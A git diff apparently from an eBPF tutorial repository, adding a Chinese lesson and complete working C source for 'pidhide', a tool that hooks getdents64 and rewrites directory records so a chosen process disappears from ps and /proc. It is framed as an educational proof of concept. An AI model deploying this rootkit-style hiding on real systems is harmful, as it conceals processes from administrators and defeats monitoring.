    
    +SEC("tp/syscalls/sys_exit_getdents64")
    +int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx)
    +{
    +    size_t pid_tgid = bpf_get_current_pid_tgid();
    +    int total_bytes_read = ctx->ret;
    +    // if bytes_read is 0, everything's been read
    +    if (total_bytes_read <= 0) {
    +        return 0;
    +    }
    +
    +    // Check we stored the address of the buffer from the syscall entry
    +    long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buffs, &pid_tgid);
    +    if (pbuff_addr == 0) {
    +        return 0;
    +    }
    +
    +    // All of this is quite complex, but basically boils down to
    +    // Calling 'handle_getdents_exit' in a loop to iterate over the file listing
    +    // in chunks of 200, and seeing if a folder with the name of our pid is in there.
    +    // If we find it, use 'bpf_tail_call' to jump to handle_getdents_patch to do the actual
    +    // patching
    +    long unsigned int buff_addr = *pbuff_addr;
    +    struct linux_dirent64 *dirp = 0;
    +    int pid = pid_tgid >> 32;
    +    short unsigned int d_reclen = 0;
    +    char filename[max_pid_len];
    +
    +    unsigned int bpos = 0;
    +    unsigned int *pBPOS = bpf_map_lookup_elem(&map_bytes_read, &pid_tgid);
    +    if (pBPOS != 0) {
    +        bpos = *pBPOS;
    +    }
    +
    +    for (int i = 0; i < 200; i ++) {
    +        if (bpos >= total_bytes_read) {
    +            break;
    +        }
    +        dirp = (struct linux_dirent64 *)(buff_addr+bpos);
    +        bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen);
    +        bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name);
    +
    +        int j = 0;
    +        for (j = 0; j < pid_to_hide_len; j++) {
    +            if (filename[j] != pid_to_hide[j]) {
    +                break;
    +            }
    +        }
    +        if (j == pid_to_hide_len) {
    +            // ***********
    +            // We've found the folder!!!
    +            // Jump to handle_getdents_patch so we can remove it!
    +            // ***********
    +            bpf_map_delete_elem(&map_bytes_read, &pid_tgid);
    +            bpf_map_delete_elem(&map_buffs, &pid_tgid);
    +            bpf_tail_call(ctx, &map_prog_array, PROG_02);
    +        }
    +        bpf_map_update_elem(&map_to_patch, &pid_tgid, &dirp, BPF_ANY);
    +        bpos += d_reclen;
    +    }
    +
    +    // If we didn't find it, but there's still more to read,
    +    // jump back the start of this function and keep looking
    +    if (bpos < total_bytes_read) {
    +        bpf_map_update_elem(&map_bytes_read, &pid_tgid, &bpos, BPF_ANY);
    +        bpf_tail_call(ctx, &map_prog_array, PROG_01);
    +    }
    +    bpf_map_delete_elem(&map_bytes_read, &pid_tgid);
    +    bpf_map_delete_elem(&map_buffs, &pid_tgid);
    +
    +    return 0;
    +}
    +
    +
    +

    在这个函数中,我们首先获取了当前进程的 PID 和线程组 ID,然后检查系统调用是否读取到了目录的内容。如果没有读取到内容,我们就直接返回。

    +

    然后我们从 map_buffs 这个 map 中获取 getdents64 系统调用入口处保存的目录内容的地址。如果我们没有保存过这个地址,那么就没有必要进行进一步的处理。

    +

    接下来的部分有点复杂,我们用了一个循环来迭代读取目录的内容,并且检查是否有我们想要隐藏的进程的 PID。如果我们找到了,我们就用 bpf_tail_call 函数跳转到 handle_getdents_patch 函数,进行实际的隐藏操作。

    +
    SEC("tp/syscalls/sys_exit_getdents64")
    +int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx)
    +{
    +    // Only patch if we've already checked and found our pid's folder to hide
    +    size_t pid_tgid = bpf_get_current_pid_tgid();
    +    long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_to_patch, &pid_tgid);
    +    if (pbuff_addr == 0) {
    +        return 0;
    +    }
    +
    +    // Unlink target, by reading in previous linux_dirent64 struct,
    +    // and setting it's d_reclen to cover itself and our target.
    +    // This will make the program skip over our folder.
    +    long unsigned int buff_addr = *pbuff_addr;
    +    struct linux_dirent64 *dirp_previous = (struct linux_dirent64 *)buff_addr;
    +    short unsigned int d_reclen_previous = 0;
    +    bpf_probe_read_user(&d_reclen_previous, sizeof(d_reclen_previous), &dirp_previous->d_reclen);
    +
    +    struct linux_dirent64 *dirp = (struct linux_dirent64 *)(buff_addr+d_reclen_previous);
    +    short unsigned int d_reclen = 0;
    +    bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen);
    +
    +    // Debug print
    +    char filename[max_pid_len];
    +    bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp_previous->d_name);
    +    filename[pid_to_hide_len-1] = 0x00;
    +    bpf_printk("[PID_HIDE] filename previous %s\n", filename);
    +    bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name);
    +    filename[pid_to_hide_len-1] = 0x00;
    +    bpf_printk("[PID_HIDE] filename next one %s\n", filename);
    +
    +    // Attempt to overwrite
    +    short unsigned int d_reclen_new = d_reclen_previous + d_reclen;
    +    long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new));
    +
    +    // Send an event
    +    struct event *e;
    +    e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
    +    if (e) {
    +        e->success = (ret == 0);
    +        e->pid = (pid_tgid >> 32);
    +        bpf_get_current_comm(&e->comm, sizeof(e->comm));
    +        bpf_ringbuf_submit(e, 0);
    +    }
    +
    +    bpf_map_delete_elem(&map_to_patch, &pid_tgid);
    +    return 0;
    +}
    +
    +
    +

在 handle_getdents_patch 函数中,我们首先检查是否已经找到了想要隐藏的进程的 PID(即 map_to_patch 中是否保存了上一个目录项的地址)。然后我们分别读取上一个目录项和目标目录项的 d_reclen 字段,并把上一个目录项的 d_reclen 改写为两者之和,让它“覆盖”掉目标目录项,这样遍历目录的程序就会直接跳过我们要隐藏的那一项。
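举一个简化的数字例子(数值仅作示意):假设上一个目录项的 d_reclen 是 24 字节,要隐藏的目录项的 d_reclen 是 32 字节,那么把上一个目录项的 d_reclen 改写成 56 之后,按 d_reclen 逐项前进的遍历代码就会直接从上一个目录项跳到被隐藏目录项之后的位置,被隐藏的那一项在调用者看来就不存在了。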

    +

    在这个过程中,我们用到了 bpf_probe_read_userbpf_probe_read_user_strbpf_probe_write_user 这几个函数来读取和写入用户空间的数据。这是因为在内核空间,我们不能直接访问用户空间的数据,必须使用这些特殊的函数。

    +

    在我们完成隐藏操作后,我们会向一个名为 rb 的环形缓冲区发送一个事件,表示我们已经成功地隐藏了一个进程。我们用 bpf_ringbuf_reserve 函数来预留缓冲区空间,然后将事件的数据填充到这个空间,并最后用 bpf_ringbuf_submit 函数将事件提交到缓冲区。
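rb 这个环形缓冲区 map,以及内核态与用户态共用的事件结构体 event,其定义大致如下(event 定义在 common.h 中):

    // Ringbuffer Map to pass messages from kernel to user
    struct {
        __uint(type, BPF_MAP_TYPE_RINGBUF);
        __uint(max_entries, 256 * 1024);
    } rb SEC(".maps");

    // common.h 中的事件结构
    #define TASK_COMM_LEN 16
    struct event {
        int pid;
        char comm[TASK_COMM_LEN];
        bool success;
    };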

    +

    最后,我们清理了之前保存在 map 中的数据,并返回。

    +

    这段代码是在 eBPF 环境下实现进程隐藏的一个很好的例子。通过这个例子,我们可以看到 eBPF 提供的丰富的功能,如系统调用跟踪、map 存储、用户空间数据访问、尾调用等。这些功能使得我们能够在内核空间实现复杂的逻辑,而不需要修改内核代码。

    +

    用户态 eBPF 程序实现

    +

    我们在用户态的 eBPF 程序中主要进行了以下几个操作:

    +
      +
1. 打开 eBPF 程序。
2. 设置我们想要隐藏的进程的 PID。
3. 验证并加载 eBPF 程序。
4. 等待并处理由 eBPF 程序发送的事件。
    +

    首先,我们打开了 eBPF 程序。这个过程是通过调用 pidhide_bpf__open 函数实现的。如果这个过程失败了,我们就直接返回。

    +
        skel = pidhide_bpf__open();
    +    if (!skel)
    +    {
    +        fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno));
    +        return 1;
    +    }
    +
    +

    接下来,我们设置了我们想要隐藏的进程的 PID。这个过程是通过将 PID 保存到 eBPF 程序的 rodata 区域实现的。默认情况下,我们隐藏的是当前进程。

    +
        char pid_to_hide[10];
    +    if (env.pid_to_hide == 0)
    +    {
    +        env.pid_to_hide = getpid();
    +    }
    +    sprintf(pid_to_hide, "%d", env.pid_to_hide);
    +    strncpy(skel->rodata->pid_to_hide, pid_to_hide, sizeof(skel->rodata->pid_to_hide));
    +    skel->rodata->pid_to_hide_len = strlen(pid_to_hide) + 1;
    +    skel->rodata->target_ppid = env.target_ppid;
    +
    +

    然后,我们验证并加载 eBPF 程序。这个过程是通过调用 pidhide_bpf__load 函数实现的。如果这个过程失败了,我们就进行清理操作。

    +
        err = pidhide_bpf__load(skel);
    +    if (err)
    +    {
    +        fprintf(stderr, "Failed to load and verify BPF skeleton\n");
    +        goto cleanup;
    +    }
    +
    +
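在加载成功之后、开始轮询事件之前,完整源码中还有两步这里没有单独展开:一是把 handle_getdents_exit 和 handle_getdents_patch 两个程序的文件描述符填入 map_prog_array,供内核态的 bpf_tail_call 使用;二是挂载(attach)eBPF 程序并创建环形缓冲区。相关代码大致如下:

    // Setup Maps for tail calls
    int index = PROG_01;
    int prog_fd = bpf_program__fd(skel->progs.handle_getdents_exit);
    int ret = bpf_map_update_elem(
        bpf_map__fd(skel->maps.map_prog_array),
        &index, &prog_fd, BPF_ANY);
    if (ret == -1)
    {
        printf("Failed to add program to prog array! %s\n", strerror(errno));
        goto cleanup;
    }
    index = PROG_02;
    prog_fd = bpf_program__fd(skel->progs.handle_getdents_patch);
    ret = bpf_map_update_elem(
        bpf_map__fd(skel->maps.map_prog_array),
        &index, &prog_fd, BPF_ANY);
    if (ret == -1)
    {
        printf("Failed to add program to prog array! %s\n", strerror(errno));
        goto cleanup;
    }

    // Attach tracepoint handler
    err = pidhide_bpf__attach(skel);
    if (err)
    {
        fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno));
        goto cleanup;
    }

    // Set up ring buffer
    rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL);
    if (!rb)
    {
        err = -1;
        fprintf(stderr, "Failed to create ring buffer\n");
        goto cleanup;
    }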

    最后,我们等待并处理由 eBPF 程序发送的事件。这个过程是通过调用 ring_buffer__poll 函数实现的。在这个过程中,我们每隔一段时间就检查一次环形缓冲区中是否有新的事件。如果有,我们就调用 handle_event 函数来处理这个事件。

    +
    printf("Successfully started!\n");
    +printf("Hiding PID %d\n", env.pid_to_hide);
    +while (!exiting)
    +{
    +    err = ring_buffer__poll(rb, 100 /* timeout, ms */);
    +    /* Ctrl-C will cause -EINTR */
    +    if (err == -EINTR)
    +    {
    +        err = 0;
    +        break;
    +    }
    +    if (err < 0)
    +    {
    +        printf("Error polling perf buffer: %d\n", err);
    +        break;
    +    }
    +}
    +
    +

在 handle_event 函数中,我们根据事件的内容打印相应的消息。这个函数的参数包括一个上下文、事件的数据,以及数据的大小。我们首先将事件的数据转换为 event 结构体,然后根据 success 字段判断这个事件是否表示成功隐藏了一个进程,最后打印相应的消息。

    +
    static int handle_event(void *ctx, void *data, size_t data_sz)
    +{
    +    const struct event *e = data;
    +    if (e->success)
    +        printf("Hid PID from program %d (%s)\n", e->pid, e->comm);
    +    else
    +        printf("Failed to hide PID from program %d (%s)\n", e->pid, e->comm);
    +    return 0;
    +}
    +
    +

    这段代码展示了如何在用户态使用 eBPF 程序来实现进程隐藏的功能。我们首先打开 eBPF 程序,然后设置我们想要隐藏的进程的 PID,再验证并加载 eBPF 程序,最后等待并处理由 eBPF 程序发送的事件。这个过程中,我们使用了 eBPF 提供的一些高级功能,如环形缓冲区和事件处理,这些功能使得我们能够在用户态方便地与内核态的 eBPF 程序进行交互。

    +

    完整源代码:https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/24-hide

    +
    +

    本文所示技术仅为概念验证,仅供学习使用,严禁用于不符合法律法规要求的场景。

    +
    +

    编译运行,隐藏 PID

    +

    首先,我们需要编译 eBPF 程序:

    +
    make
    +
    +

    然后,假设我们想要隐藏进程 ID 为 1534 的进程,可以运行如下命令:

    +
    sudo ./pidhide --pid-to-hide 1534
    +
    +

这条命令会使所有尝试读取 /proc/ 目录的操作都无法看到 PID 为 1534 的进程。例如,我们可以先找到一个想要隐藏的进程:

    +
    $ ps -aux | grep 1534
    +yunwei      1534  0.0  0.0 244540  6848 ?        Ssl  6月02   0:00 /usr/libexec/gvfs-mtp-volume-monitor
    +yunwei     32065  0.0  0.0  17712  2580 pts/1    S+   05:43   0:00 grep --color=auto 1534
    +
    +

    此时通过 ps 命令可以看到进程 ID 为 1534 的进程。但是,如果我们运行 sudo ./pidhide --pid-to-hide 1534,再次运行 ps -aux | grep 1534,就会发现进程 ID 为 1534 的进程已经不见了。

    +
    $ sudo ./pidhide --pid-to-hide 1534
    +Hiding PID 1534
    +Hid PID from program 31529 (ps)
    +Hid PID from program 31551 (ps)
    +Hid PID from program 31560 (ps)
    +Hid PID from program 31582 (ps)
    +Hid PID from program 31582 (ps)
    +Hid PID from program 31585 (bash)
    +Hid PID from program 31585 (bash)
    +Hid PID from program 31609 (bash)
    +Hid PID from program 31640 (ps)
    +Hid PID from program 31649 (ps)
    +
    +

这个程序会把匹配该 PID 的进程隐藏起来,使得像 ps 这样的工具无法看到它。我们可以再次通过 ps aux | grep 1534 来验证:

    +
    $ ps -aux | grep 1534
    +root       31523  0.1  0.0  22004  5616 pts/2    S+   05:42   0:00 sudo ./pidhide -p 1534
    +root       31524  0.0  0.0  22004   812 pts/3    Ss   05:42   0:00 sudo ./pidhide -p 1534
    +root       31525  0.3  0.0   3808  2456 pts/3    S+   05:42   0:00 ./pidhide -p 1534
    +yunwei     31583  0.0  0.0  17712  2612 pts/1    S+   05:42   0:00 grep --color=auto 1534
    +
    +

    总结

    +

通过本篇 eBPF 入门实践教程,我们深入了解了如何使用 eBPF 来隐藏进程或文件信息。我们学习了如何编写和加载 eBPF 程序,如何通过 eBPF 拦截系统调用并修改它们的行为,以及如何将这些知识应用到实际的网络安全和防御工作中。此外,我们也再次体会到了 eBPF 的强大之处:它能够在不修改内核源代码、不重启内核的情况下,让用户在内核中执行自定义代码。

    +

    您还可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

    +

    接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容,包括如何使用 eBPF 进行网络和系统性能分析,如何编写更复杂的 eBPF 程序以及如何将 eBPF 集成到您的应用中。希望你会在我们的教程中找到有用的信息,进一步提升你的 eBPF 开发技能。

    + + diff --git a/24-hide/pidhide.bpf.c b/24-hide/pidhide.bpf.c new file mode 100644 index 0000000..47f8895 --- /dev/null +++ b/24-hide/pidhide.bpf.c @@ -0,0 +1,208 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include "vmlinux.h" +#include +#include +#include +#include "common.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +// Ringbuffer Map to pass messages from kernel to user +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +// Map to fold the dents buffer addresses +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_buffs SEC(".maps"); + +// Map used to enable searching through the +// data in a loop +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, int); +} map_bytes_read SEC(".maps"); + +// Map with address of actual +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, 8192); + __type(key, size_t); + __type(value, long unsigned int); +} map_to_patch SEC(".maps"); + +// Map to hold program tail calls +struct { + __uint(type, BPF_MAP_TYPE_PROG_ARRAY); + __uint(max_entries, 5); + __type(key, __u32); + __type(value, __u32); +} map_prog_array SEC(".maps"); + +// Optional Target Parent PID +const volatile int target_ppid = 0; + +// These store the string represenation +// of the PID to hide. This becomes the name +// of the folder in /proc/ +const volatile int pid_to_hide_len = 0; +const volatile char pid_to_hide[max_pid_len]; + +// struct linux_dirent64 { +// u64 d_ino; /* 64-bit inode number */ +// u64 d_off; /* 64-bit offset to next structure */ +// unsigned short d_reclen; /* Size of this dirent */ +// unsigned char d_type; /* File type */ +// char d_name[]; /* Filename (null-terminated) */ }; +// int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count); +SEC("tp/syscalls/sys_enter_getdents64") +int handle_getdents_enter(struct trace_event_raw_sys_enter *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + // Check if we're a process thread of interest + // if target_ppid is 0 then we target all pids + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + int pid = pid_tgid >> 32; + unsigned int fd = ctx->args[0]; + unsigned int buff_count = ctx->args[2]; + + // Store params in map for exit function + struct linux_dirent64 *dirp = (struct linux_dirent64 *)ctx->args[1]; + bpf_map_update_elem(&map_buffs, &pid_tgid, &dirp, BPF_ANY); + + return 0; +} + +SEC("tp/syscalls/sys_exit_getdents64") +int handle_getdents_exit(struct trace_event_raw_sys_exit *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + int total_bytes_read = ctx->ret; + // if bytes_read is 0, everything's been read + if (total_bytes_read <= 0) { + return 0; + } + + // Check we stored the address of the buffer from the syscall entry + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_buffs, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + + // All of this is quite complex, but basically boils down to + // Calling 'handle_getdents_exit' in a loop to iterate over the file listing + // in chunks of 200, and seeing if a folder with the name of our pid is in there. 
+ // If we find it, use 'bpf_tail_call' to jump to handle_getdents_patch to do the actual + // patching + long unsigned int buff_addr = *pbuff_addr; + struct linux_dirent64 *dirp = 0; + int pid = pid_tgid >> 32; + short unsigned int d_reclen = 0; + char filename[max_pid_len]; + + unsigned int bpos = 0; + unsigned int *pBPOS = bpf_map_lookup_elem(&map_bytes_read, &pid_tgid); + if (pBPOS != 0) { + bpos = *pBPOS; + } + + for (int i = 0; i < 200; i ++) { + if (bpos >= total_bytes_read) { + break; + } + dirp = (struct linux_dirent64 *)(buff_addr+bpos); + bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); + + int j = 0; + for (j = 0; j < pid_to_hide_len; j++) { + if (filename[j] != pid_to_hide[j]) { + break; + } + } + if (j == pid_to_hide_len) { + // *********** + // We've found the folder!!! + // Jump to handle_getdents_patch so we can remove it! + // *********** + bpf_map_delete_elem(&map_bytes_read, &pid_tgid); + bpf_map_delete_elem(&map_buffs, &pid_tgid); + bpf_tail_call(ctx, &map_prog_array, PROG_02); + } + bpf_map_update_elem(&map_to_patch, &pid_tgid, &dirp, BPF_ANY); + bpos += d_reclen; + } + + // If we didn't find it, but there's still more to read, + // jump back the start of this function and keep looking + if (bpos < total_bytes_read) { + bpf_map_update_elem(&map_bytes_read, &pid_tgid, &bpos, BPF_ANY); + bpf_tail_call(ctx, &map_prog_array, PROG_01); + } + bpf_map_delete_elem(&map_bytes_read, &pid_tgid); + bpf_map_delete_elem(&map_buffs, &pid_tgid); + + return 0; +} + +SEC("tp/syscalls/sys_exit_getdents64") +int handle_getdents_patch(struct trace_event_raw_sys_exit *ctx) +{ + // Only patch if we've already checked and found our pid's folder to hide + size_t pid_tgid = bpf_get_current_pid_tgid(); + long unsigned int* pbuff_addr = bpf_map_lookup_elem(&map_to_patch, &pid_tgid); + if (pbuff_addr == 0) { + return 0; + } + + // Unlink target, by reading in previous linux_dirent64 struct, + // and setting it's d_reclen to cover itself and our target. + // This will make the program skip over our folder. 
+ long unsigned int buff_addr = *pbuff_addr; + struct linux_dirent64 *dirp_previous = (struct linux_dirent64 *)buff_addr; + short unsigned int d_reclen_previous = 0; + bpf_probe_read_user(&d_reclen_previous, sizeof(d_reclen_previous), &dirp_previous->d_reclen); + + struct linux_dirent64 *dirp = (struct linux_dirent64 *)(buff_addr+d_reclen_previous); + short unsigned int d_reclen = 0; + bpf_probe_read_user(&d_reclen, sizeof(d_reclen), &dirp->d_reclen); + + // Debug print + char filename[max_pid_len]; + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp_previous->d_name); + filename[pid_to_hide_len-1] = 0x00; + bpf_printk("[PID_HIDE] filename previous %s\n", filename); + bpf_probe_read_user_str(&filename, pid_to_hide_len, dirp->d_name); + filename[pid_to_hide_len-1] = 0x00; + bpf_printk("[PID_HIDE] filename next one %s\n", filename); + + // Attempt to overwrite + short unsigned int d_reclen_new = d_reclen_previous + d_reclen; + long ret = bpf_probe_write_user(&dirp_previous->d_reclen, &d_reclen_new, sizeof(d_reclen_new)); + + // Send an event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = (pid_tgid >> 32); + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + bpf_ringbuf_submit(e, 0); + } + + bpf_map_delete_elem(&map_to_patch, &pid_tgid); + return 0; +} diff --git a/24-hide/pidhide.c b/24-hide/pidhide.c new file mode 100644 index 0000000..021d51b --- /dev/null +++ b/24-hide/pidhide.c @@ -0,0 +1,252 @@ +// SPDX-License-Identifier: BSD-3-Clause +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "pidhide.skel.h" +#include "common.h" + +// These are used by a number of +// different programs to sync eBPF Tail Call +// login between user space and kernel +#define PROG_00 0 +#define PROG_01 1 +#define PROG_02 2 + +// Setup Argument stuff +static struct env +{ + int pid_to_hide; + int target_ppid; +} env; + +const char *argp_program_version = "pidhide 1.0"; +const char *argp_program_bug_address = ""; +const char argp_program_doc[] = + "PID Hider\n" + "\n" + "Uses eBPF to hide a process from usermode processes\n" + "By hooking the getdents64 syscall and unlinking the pid folder\n" + "\n" + "USAGE: ./pidhide -p 2222 [-t 1111]\n"; + +static const struct argp_option opts[] = { + {"pid-to-hide", 'p', "PID-TO-HIDE", 0, "Process ID to hide. 
Defaults to this program"}, + {"target-ppid", 't', "TARGET-PPID", 0, "Optional Parent PID, will only affect its children."}, + {}, +}; +static error_t parse_arg(int key, char *arg, struct argp_state *state) +{ + switch (key) + { + case 'p': + errno = 0; + env.pid_to_hide = strtol(arg, NULL, 10); + if (errno || env.pid_to_hide <= 0) + { + fprintf(stderr, "Invalid pid: %s\n", arg); + argp_usage(state); + } + break; + case 't': + errno = 0; + env.target_ppid = strtol(arg, NULL, 10); + if (errno || env.target_ppid <= 0) + { + fprintf(stderr, "Invalid pid: %s\n", arg); + argp_usage(state); + } + break; + case ARGP_KEY_ARG: + argp_usage(state); + break; + default: + return ARGP_ERR_UNKNOWN; + } + return 0; +} +static const struct argp argp = { + .options = opts, + .parser = parse_arg, + .doc = argp_program_doc, +}; + +static volatile sig_atomic_t exiting; + +void sig_int(int signo) +{ + exiting = 1; +} + +static bool setup_sig_handler() +{ + // Add handlers for SIGINT and SIGTERM so we shutdown cleanly + __sighandler_t sighandler = signal(SIGINT, sig_int); + if (sighandler == SIG_ERR) + { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + sighandler = signal(SIGTERM, sig_int); + if (sighandler == SIG_ERR) + { + fprintf(stderr, "can't set signal handler: %s\n", strerror(errno)); + return false; + } + return true; +} + +static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) +{ + return vfprintf(stderr, format, args); +} + +static bool setup() +{ + // Set up libbpf errors and debug info callback + libbpf_set_print(libbpf_print_fn); + + // Setup signal handler so we exit cleanly + if (!setup_sig_handler()) + { + return false; + } + + return true; +} + +static int handle_event(void *ctx, void *data, size_t data_sz) +{ + const struct event *e = data; + if (e->success) + printf("Hid PID from program %d (%s)\n", e->pid, e->comm); + else + printf("Failed to hide PID from program %d (%s)\n", e->pid, e->comm); + return 0; +} + +int main(int argc, char **argv) +{ + struct ring_buffer *rb = NULL; + struct pidhide_bpf *skel; + int err; + + // Parse command line arguments + err = argp_parse(&argp, argc, argv, 0, NULL, NULL); + if (err) + { + return err; + } + if (env.pid_to_hide == 0) + { + printf("Pid Requried, see %s --help\n", argv[0]); + exit(1); + } + + // Do common setup + if (!setup()) + { + exit(1); + } + + // Open BPF application + skel = pidhide_bpf__open(); + if (!skel) + { + fprintf(stderr, "Failed to open BPF program: %s\n", strerror(errno)); + return 1; + } + + // Set the Pid to hide, defaulting to our own PID + char pid_to_hide[10]; + if (env.pid_to_hide == 0) + { + env.pid_to_hide = getpid(); + } + sprintf(pid_to_hide, "%d", env.pid_to_hide); + strncpy(skel->rodata->pid_to_hide, pid_to_hide, sizeof(skel->rodata->pid_to_hide)); + skel->rodata->pid_to_hide_len = strlen(pid_to_hide) + 1; + skel->rodata->target_ppid = env.target_ppid; + + // Verify and load program + err = pidhide_bpf__load(skel); + if (err) + { + fprintf(stderr, "Failed to load and verify BPF skeleton\n"); + goto cleanup; + } + + // Setup Maps for tail calls + int index = PROG_01; + int prog_fd = bpf_program__fd(skel->progs.handle_getdents_exit); + int ret = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_prog_array), + &index, + &prog_fd, + BPF_ANY); + if (ret == -1) + { + printf("Failed to add program to prog array! 
%s\n", strerror(errno)); + goto cleanup; + } + index = PROG_02; + prog_fd = bpf_program__fd(skel->progs.handle_getdents_patch); + ret = bpf_map_update_elem( + bpf_map__fd(skel->maps.map_prog_array), + &index, + &prog_fd, + BPF_ANY); + if (ret == -1) + { + printf("Failed to add program to prog array! %s\n", strerror(errno)); + goto cleanup; + } + + // Attach tracepoint handler + err = pidhide_bpf__attach(skel); + if (err) + { + fprintf(stderr, "Failed to attach BPF program: %s\n", strerror(errno)); + goto cleanup; + } + + // Set up ring buffer + rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL); + if (!rb) + { + err = -1; + fprintf(stderr, "Failed to create ring buffer\n"); + goto cleanup; + } + + printf("Successfully started!\n"); + printf("Hiding PID %d\n", env.pid_to_hide); + while (!exiting) + { + err = ring_buffer__poll(rb, 100 /* timeout, ms */); + /* Ctrl-C will cause -EINTR */ + if (err == -EINTR) + { + err = 0; + break; + } + if (err < 0) + { + printf("Error polling perf buffer: %d\n", err); + break; + } + } + +cleanup: + pidhide_bpf__destroy(skel); + return -err; +} diff --git a/25-signal/.gitignore b/25-signal/.gitignore new file mode 100644 index 0000000..e8a99c2 --- /dev/null +++ b/25-signal/.gitignore @@ -0,0 +1,9 @@ +.vscode +package.json +*.o +*.skel.json +*.skel.yaml +package.yaml +ecli +bootstrap +bpfdos diff --git a/25-signal/LICENSE b/25-signal/LICENSE new file mode 100644 index 0000000..47fc3a4 --- /dev/null +++ b/25-signal/LICENSE @@ -0,0 +1,29 @@ +BSD 3-Clause License + +Copyright (c) 2020, Andrii Nakryiko +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + +1. Redistributions of source code must retain the above copyright notice, this + list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE +IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
diff --git a/25-signal/Makefile b/25-signal/Makefile new file mode 100644 index 0000000..338993f --- /dev/null +++ b/25-signal/Makefile @@ -0,0 +1,141 @@ +# SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) +OUTPUT := .output +CLANG ?= clang +LIBBPF_SRC := $(abspath ../../libbpf/src) +BPFTOOL_SRC := $(abspath ../../bpftool/src) +LIBBPF_OBJ := $(abspath $(OUTPUT)/libbpf.a) +BPFTOOL_OUTPUT ?= $(abspath $(OUTPUT)/bpftool) +BPFTOOL ?= $(BPFTOOL_OUTPUT)/bootstrap/bpftool +LIBBLAZESYM_SRC := $(abspath ../../blazesym/) +LIBBLAZESYM_OBJ := $(abspath $(OUTPUT)/libblazesym.a) +LIBBLAZESYM_HEADER := $(abspath $(OUTPUT)/blazesym.h) +ARCH ?= $(shell uname -m | sed 's/x86_64/x86/' \ + | sed 's/arm.*/arm/' \ + | sed 's/aarch64/arm64/' \ + | sed 's/ppc64le/powerpc/' \ + | sed 's/mips.*/mips/' \ + | sed 's/riscv64/riscv/' \ + | sed 's/loongarch64/loongarch/') +VMLINUX := ../../vmlinux/$(ARCH)/vmlinux.h +# Use our own libbpf API headers and Linux UAPI headers distributed with +# libbpf to avoid dependency on system-wide headers, which could be missing or +# outdated +INCLUDES := -I$(OUTPUT) -I../../libbpf/include/uapi -I$(dir $(VMLINUX)) +CFLAGS := -g -Wall +ALL_LDFLAGS := $(LDFLAGS) 